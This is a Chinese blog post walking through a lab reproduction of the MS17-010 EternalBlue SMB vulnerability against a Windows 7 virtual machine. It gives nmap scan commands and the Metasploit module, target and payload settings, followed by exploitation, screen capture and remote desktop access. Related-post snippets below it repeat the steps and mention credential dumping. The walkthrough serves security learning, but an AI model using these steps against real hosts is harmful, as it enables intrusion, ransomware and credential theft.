MS010-17永恒之蓝漏洞复现

于 2024-10-29 16:07:34 发布
阅读量688 收藏 20
点赞数 20
文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhongyuekang820/article/details/143332090
版权

ms17-010漏洞(永恒之蓝)

原理:

永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

SMB协议:

SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口

攻击方式:

 恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

本次黑客使用的是Petya勒索病毒的变种Petwarp,攻击时仍然使用了永恒之蓝勒索漏洞,并会获取系统用户名与密码进行内网传播。

本次爆发使用了已知OFFICE漏洞、永恒之蓝SMB漏洞、局域网感染等网络自我复制技术,使得病毒可以在短时间内呈爆发态势。同时,该病毒与普通勒索病毒不同,其不会对电脑中的每个文件都进行加密,而是通过加密硬盘驱动器主文件表(MFT),使主引导记录(MBR)不可操作,通过占用物理磁盘上的文件名,大小和位置的信息来限制对完整系统的访问,从而让电脑无法启动,相较普通勒索病毒对系统更具破坏性。

靶机:windows7 x64

攻击机:kali linux 2024

准备工作:win7在控制面板中关闭防火墙

1,win7设置为NAT模式,并记录其MAC地址

2,在攻击机上进行信息收集,首先获取win7的IP地址

Win7的IP地址记录为192.168.23.171

3,对靶机进行进一步扫描

nmap -T4 -O -v -sV 192.168.23.171

参数:-T4   设置时序模板,(0-5),扫描速度,越大越快

-O  操作系统的识别; -v   提高输出信息的详细程度; -sV  服务识别

可以看到,靶机的445端口开放,连带着后面的服务:microsoft-ds,靶机系统版本

4,扫描445端口提供服务的漏洞和编号

nmap --script=vuln 192.168.23.171 -v

--script  ##使用脚本扫描

vuln      ##使用常规漏洞扫描脚本

看到了ms017-010漏洞的信息

5,打开metasploit msfconsole

6,搜索ms17-010相关模块,可以看到一共找到了6个不同的模块(选项0——5)

7,加载扫描模块(选项1)

use auxiliary/scanner/smb/smb_ms17_010

8,查看配置选项 show options

9,RHOSTS显示远程主机未配置,配置目标主机。

set rhosts 192.168.23.171

10,开始扫描漏洞,再次证实靶机存在MS17-010漏洞。 Exploit

11,使用永恒之蓝攻击模块:use exploit/windows/smb/ms17_010_eternalblue

并设置攻击载荷:set payload

12,查看选项

查看选项并设置rhosts:set rhosts 192.168.23.171

13,开始攻击 exploit

成功的标志

14,屏幕捕获

15,启动远程桌面

16,使用 rdesktop 命令远程连接桌面

渗透完成

声明:部分内容来自于网络,如有侵权联系删除

freesec
关注
Ms17-010永恒之蓝漏洞复现
千寻的博客
01-04 1623
Ms17-010永恒之蓝漏洞复现 0x00 漏洞介绍 永恒之蓝是指2017年4月14日晚, “永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限 2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,在多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 0x01漏洞原理 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对S...
渗透测试和复现ms17-010漏洞攻击
Yb528970805的博客
09-15 504
ms17_010 是一种操作系统漏洞,仅影响 Windows系统中的 SMBv1 服务。这个漏洞是由于SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。
Windows操作系统下的MS17_010漏洞利用
最新发布
Ypraise的博客
10-07 678
攻击者在正常或非正常连接时与目标靶机建立联系后,通过目标主机上的445端口msf漏洞,用kali直接控制。
MS17-010漏洞复现
半夜好饿的博客
07-23 1041
实验环境: kali (虚拟机) Windows 7 x64(虚拟机) 1、查看两台机器的IP地址,且关闭win7防火墙 可见win7 IP为: 192.168.15.129 kali 为:192.168.15.130 2、使用mdfconsole 在此之前需要进行端口扫描,需要确保win7的445端口开放,知道自己的没有关闭此端口,所以在这不进行端口确认了,像验证的可以利用nmap进行扫描,...
Linux Samba远程代码执行漏洞(CVE-2017-7494)漏洞复现
旺仔Sec&blog
05-29 2413
1.该漏洞CVE-2017-7494又被称为Linux版的永恒之蓝 2.主要是利用smb上的反弹shell漏洞,进行远程代码执行 3.samba3.5.0 到4.6.4/4.5.10/4.4.14的中间版本、docker
网络安全之渗透实战学习
Innocence_0的博客
10-16 1310
对于SCF文件攻击,我们也可以通过下列方法来防止这种攻击的发生:1、使用Kerbeors认证或SMB签名;2、禁用共享文件给未认证用户所提供的写入权限;3、确保使用的是NTLMv2密码并增加口令的复杂程度。
精解局域网访问及共享
shuzui1985的专栏
05-16 2299
转载自 http://jeffyyko.blog.51cto.com/28563/149596 本文主要讨论XP系统在共享访问时遇到的一些问题及解决方法。   通过本文,你可以了解到 ◆何为137及445等端口 ◆如何理解netbios的名称解析 ◆什么是SMB协议?如何理解? ◆XP环境下三种访问方式分析   一、基本服务和端口分析       为了方便实验,这里搭建了一个
Windows 7 ms17-010永恒之蓝漏洞复现
m0_51600840的博客
07-04 2250
复现ms17-010漏洞环境:1.进入框架:msfconsole 2.使用search命令查找相关漏洞: search ms17-010 3.使用use进入模块: use exploit/windows/smb/ms17_010_eternalblue 4.设置本机地址:set lhost 192.168.238.130(输入自己本机的IP地址即kali虚拟机地址) 5. 设置靶机地址:set rhost 192.168.238.128(输入靶机的IP地址即Windows 7虚拟机地址) 注意靶机地址和攻
ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码
weixin_48710435的博客
08-05 2759
一、实验环境: 1、攻击机:KaliIP:192.168.218.157 1)攻击工具:msf 2)分析工具:wireshark 2、靶 机:Windows7(旗舰版) IP:192.168.218.160 1)开启网络共享(SMB协议) 2)关闭防火墙 3、网卡连接方式:Vmnet8(NAT) 二、实验步骤: 1、测试攻击机与靶机的连通性 2.进行MS17-010漏洞扫描 1)启动msf 命令:msfconsole ...
MS17-010永恒之蓝漏洞原理及复现(学习中,未完善)
chenbx163的博客
08-02 265
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。设置被攻击IP地址后,并执行,然后找到蓝屏命令use0(其他电脑不一定,根据英文选择)并使用。一、什么是永恒之蓝
2024年最新[永恒之蓝]实战-漏洞复现_永恒之蓝漏洞复现实验
2401_84297796的博客
05-03 1498
6、这个选项的用处主要是渗透攻击成功后目标机与LHOST建立的Shell连接,所以LHOST参数设置我们自己本地的IP地址,RHOSTS参数还是目标IP。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。2、这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击。3、使用#show options 命令,查看需要设置的选项(Required为yes是必须设置的选项)。
SMB漏洞
热门推荐
小锤队长的博客
10-06 1万+
目录 一,SMB信息泄露 充电站: 二,MS17-010 (永恒之蓝) 复现 一,SMB信息泄露 靶场:192.168.11.167 攻击机:kali 192.168.11.165 信息探测: nmap -sV 192.168.11.167 可以看到开放了,22 ssh端口,139,445的smb服务端口,以及3306的mysal服务 扫描更详细的信息: nmap -...
永恒之蓝漏洞 ms17_010 详解
qq_45953122的博客
10-25 7770
永恒之蓝(ms17-010)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
永恒之蓝漏洞复现(详细版)
Zqinglele的博客
03-20 4380
matesploit框架(Matesploit Framework,MSF)是一个开源工具,由Ruby程序语言编写的模块化框架,主要为后端提供用来测试的端口(如控制台、Web、CLI)。常用为控制台接口,通过该接口可以访问matesploit框架的所有插件(如payloads、利用模块、post模块等),还可使用第三方程序的插件(如sqlmap、nmap等)。这下只需配置靶机IP地址、命名的管道、端口、线程数(后三个已经配置好了)成功发现可利用漏洞ms17-010,,扫描模块结束,接下尝试进行攻击。
漏洞复现过程步骤
qq_74247740的博客
10-18 260
影响版本:Microsoft Windows Vista SP2,Windows Server 2008 SP2和R2 SP1,Windows 7 SP1,Windows 8.1,Windows Server 2012 Gold和R2,Windows RT 8.1,Windows 10 Gold,1511和1607,Windows Server 2016。端口版本:Windows Server 2008 R2 standard 7600 Microsoft-ds。端口:445端口 smb文件共享服务。
浅析ms17_010(永恒之蓝漏洞利用过程及防护措施
qq_24797991的博客
03-27 4433
永恒之蓝勒索病毒漏洞复现及防范
Windows服务器关于SMB签名未配置的漏洞处理
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
07-24 4245
SMB签名旨在帮助提高SMB协议的安全性,为了防止在传输过程中修改SMB数据包,SMB协议支持SMB数据包的数字签名。要利用SMB数据包签名,通信中涉及的客户端SMB组件和服务器端SMB组件必须启用或需要SMB数据包签名。当启用SMB签名时,SMB将停止使用RDMA远程直接数据存取,因为最大MTU限制为1,394字节,这会导致邮件碎片和重组,并降低整体性能。SMB签名未配置漏洞是指远程SMB服务器上未配置需要签名,这将导致未经身份验证的远程攻击者可以利用此漏洞SMB服务器进行中间人攻击。...
经典的ms08_067 漏洞利用
play_science的博客
05-27 1926
ms08_067漏洞smb服务的漏洞,而smb 服务是做什么的,很简单,他的一个经典使用方式就是共享文档(当然,这是windows里的服务内容),所以为了重现这个漏洞并让我们对其进行攻击,并取得控制权,就需要建立相关的网络环境。 我这使用的是虚拟机的方式建立,(原因嘛,当然是省电了)虚拟机软件virtul_box,虚拟机靶机我使用的是windows xp Sp 2 ,不知道是什么原因,我在sp3上面使用这个攻击方式并没有成功,可能已经加入了相关补丁吧。我使用的攻击机是parrot_linux(因为我觉得这
ms17-010(永恒之蓝漏洞复现与处理
06-06
对于 ms17-010(永恒之蓝漏洞复现和处理,需要进行以下几个步骤: 1. 确认系统是否存在漏洞:检查系统是否存在 SMB 服务,如果存在并且版本为 Windows 7、Windows Server 2008 R2 或更高版本,则可能存在该漏洞。 2. 下载漏洞利用工具:可以使用 Metasploit 框架中的 exploit/windows/smb/ms17_010_eternalblue 模块进行漏洞利用。也可以使用其他的漏洞利用工具。 3. 进行漏洞利用:使用漏洞利用工具对目标系统进行攻击,获取目标系统的权限。 4. 处理漏洞:可以通过升级系统补丁或者关闭 SMB 服务来修复该漏洞。 总的来说,处理 ms17-010(永恒之蓝漏洞需要及时进行漏洞扫描和修复,以避免被黑客攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值
>